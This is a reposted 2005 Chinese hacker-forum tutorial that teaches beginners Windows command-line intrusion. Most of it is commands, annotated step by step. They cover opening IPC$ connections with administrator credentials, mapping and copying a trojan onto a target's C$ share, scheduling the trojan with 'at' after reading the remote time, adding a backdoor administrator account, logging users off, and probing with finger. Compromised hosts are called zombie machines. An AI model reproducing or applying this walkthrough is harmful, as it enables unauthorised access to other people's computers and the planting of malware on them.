首页 电脑 电脑学堂 查看内容

菜鸟的重要阶段

2005-5-3 13:00 943 0

摘要: 来源:http://www.hacker-cn.com/ 大家好 我是新来小编 同时和大家一样也是一个菜鸟 希望和大家能一起成长一起学习 下面呢我来介绍一下 安全知识入门学习 第一节菜鸟必学的网络...
关键词: nbsp 命令 Net 文件 127.0 端口 telnet 0.1 用户 对方

来源:http://www.hacker-cn.com/ 大家好 我是新来小编 同时和大家一样也是一个菜鸟 希望和大家能一起成长一起学习 下面呢我来介绍一下 安全知识入门学习 第一节菜鸟必学的网络命令要学习网络入侵,首先我们必须学习一些基础的网络命令,我们所谓的基础命令其实也就是WIN 2K,WIN XP系统下的一些DOS命令,这个命令都又CMD.exe来完成概念部分:(1)2000、XP下的CMD与98的MS-DOS的不同之处:cmd.exe叫命令提示符他与98下的MS-DOS是不一样的,所以我们不能将他混为一谈,但是我们却可以用CMD.exe来执行很多DOS命令,例如:dir、cd、del等等!(2)CMD下的内部命令与外部命令的不同:CMD下的内部命令就是指:我们可以直接在CMD下就可以执行的命令,例如:telnet、ftp、dir、cd、等等,你可以在CMD下输入help进行查看,外部命令呢,就是cmd下不能直接运行的命令,(例如大家常用的nc)他需要在CMD下切换到他(NC)做在的目录你才能运行NC及NC的命令 实操部分:(一):常用入侵防护命令:Net 、telnet 、at、copy、ftp、finger、del~~~~~~ 一些常用的Net命令与例子:(1)建立IPC连接的命令 Net use //IP/ipc$ “” /user:username例如:Net use //127.0.0.1/ipc$ 123456 /user :administrator这个命令的意思就是与用户名为adminidtrator用户密码为123456的主机127.0.0.1建立ipc$空连接(2) 删除IPC$空连接Net use //ip /del例如:Net use //127.0.0.1 /del删除与主机127.0.0.1已经建立的Ipc$连接(3) 启动关闭服务:Net start                        //查看已经开启的服务Net start servernameNet stop servername例如:Net start telnet                    //开启telnet服务Net stop telnet                    //关闭telnet服务(4)启动关闭共享Net shate ipc$                    //开启ipc$默认共享Net share ipc$ /del                //关闭ipc$默认共享Net share c=c:/                   //完全共享c盘Net share d=d:/                   //删除完全共享的d盘(4) 映射硬盘Net use z: //ip/c$例如:Net use z: //127.0.0.1/c$            //把127.0.0.1的C盘映射成本机的z盘说明:映射成功后,你在我的电脑里面里面就会多出一个硬盘Z,其实Z就是127.0.0.1的C盘!Net use z: /del                    //断开映射入侵中的作用:把对方的硬盘映射过来以后我们就能直接复制文件到对方的硬盘下面了成功实现的条件:必须与对方建立ipc$连接(5) 远程复制文件_CopyCopy e:/3389.exe //127.0.0.1/c$   //将本地的E盘下的3389.exe这个文件copy到对方系统的C盘根目录下    Copy在入侵中的作用:把本地文件复制到对方硬盘Copy复制成功所需的条件:必须与主机建立ipc$连接(6) 查看远程系统的时间   Net  time //IP   Net  time //127.0.0.1               //查看远程主机127.0.0.1的本地时间   作用:得到对方时间好为自己计划任务种下木马做准备(7) 远程运行程序   At //ip time server.exe   At //127.0.0.1 12:30 c:/server.exe       //让主机在中午12:30分运行我们已经复制到他C 盘根目录下的木马server.exe 在入侵中作用:这样我们就可以用我们的木马服务端来连接我们木马,,更好的使用图形方式来控制肉鸡(8)添加管理员帐号:     Net user username 1234 /add                //添加一个密码为1234名字为  username的用户     Net localgroup administrators juntuan /add    //把username这个用户添加到管 理员组     注意:有些系统的管理员组不是administrators你要根据实际情况来改,不过99.9%的系统的管理员组还是administrators的。     修改用户密码:     Net user username 1234                     //把用户username的密码修改成1233。(9)远程登陆主机_telnet     telnet IP port     例如:telnet 127.0.0.1 1234            //连接登陆127.0.0.1的1234端口     (当目标主机的端口是默认的23的时候我们不需要+端口即:telnet IP 就好)(10)传输文件命令_ftp      其实这个我个人觉得用途不大,毕竟当你拿到了FTP密码之后你可以用flashftp或者cutftp有一个图形截面的交互如何不好呢?      首先在CMD里面输入ftp      然后输入:open IP port      例如:open 127.0.0.1 1234            //连接登陆127.0.0.1的1234端口      如何开启windows系统自带的ftp服务:      Net start msftppsvc(11)        查看文件夹的属性_caclsCacls xiaod                 //查看xiaod这个文件夹的属性       参数说明:F:(完全控制)R:(只读)C:(允许更改)W:(允许写入)N:(没有任何权限)(12)        删除文件_delDel是用来删除文件命令      首先进入你想删除的文件的目录      Del xiaod.txt                   //删除xiaod.txt这个个文件      Del xiaod.txt /f     //强制删除xiaod.txt这个个文件(当该文件无法正常删除的时候使用该命令) (13) finger命令     Finger是一个信息刺探命令一般在对方开启了79端口时命令使用     Finger –l user @computer     参数详解: -l 用长列表格式显示消息                User:指定用户的信息     成功实现的条件:对方必须安装tcp/ip协议(14):文件写入命令_echo:Echo 你好 > index.htm      //用你好来覆盖index.htm的内容Echo 你好 >>index.htm     //将“你好”添加到index.htm(15):写入注册表文件_regedit       Regedit /s filename.reg         //s是写入参数(16):端口映射_chgport     Chgport 3=5   //将端口3映射到5     Chgport /d*    //删除所有端口映射(17):文件映射_subst     Subst b:/ c:/winnt     //这个时候当你访问硬盘B的时候你就是访问了  c:/winnt目录(18):查看当前正在使用的帐号:     Query session     //查看帐号(19):踢掉指定用:     Logoff id         //注意ID,是在用query session查看到的用户的id而不是用户名。(20):发送消息给某用户或者内网主机      Net send hostname or /IP message      例如:net send xiaod or /127.0.0.1 hello!   
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部